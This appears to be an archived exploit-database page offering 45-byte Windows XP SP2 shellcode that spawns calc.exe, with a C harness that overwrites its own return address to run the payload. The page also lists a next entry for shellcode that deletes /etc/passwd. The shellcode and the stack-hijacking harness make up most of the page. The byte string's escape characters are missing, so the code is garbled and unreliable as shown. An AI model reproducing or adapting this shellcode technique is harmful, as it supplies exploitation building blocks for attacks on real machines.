win32/xp sp2 calc.exe 45 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : win32/xp sp2 calc.exe 45 bytes
# Published : 2009-12-24
# Author : Stack
# Previous Title : Win32 XP SP3 addFirewallRule
# Next Title : linux/x86 unlink(/etc/passwd) & exit() 35 bytes

/*
win32/xp sp2 calc.exe 45 bytes
Author : Mountassif Moad
Big Thnx : To my brother iuoisn & His0ka & Jadi ...... Mr.Safa7
Changed by : Stack
First shellcode : http://www.milw0rm.com/exploits/7971
Description : It is 45 Bytes Shellcode which Execute calc.exe Tested Under Windows Xp SP2
for exploited a stack overflow have a small space to put our shellcode xd :d  just for fun :d

*/
#include "stdio.h"
unsigned char shellcode[] =
"xB8xFFxEFxFFxFFxF7xD0x2BxE0x55x8BxEC"
"x33xFFx57x83xECx04xC6x45xF8x63xC6x45"
"xF9x61xC6x45xFAx6CxC6x45xFBx63x8Dx45"
"xF8x50xBBxC7x93xBFx77xFFxD3";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}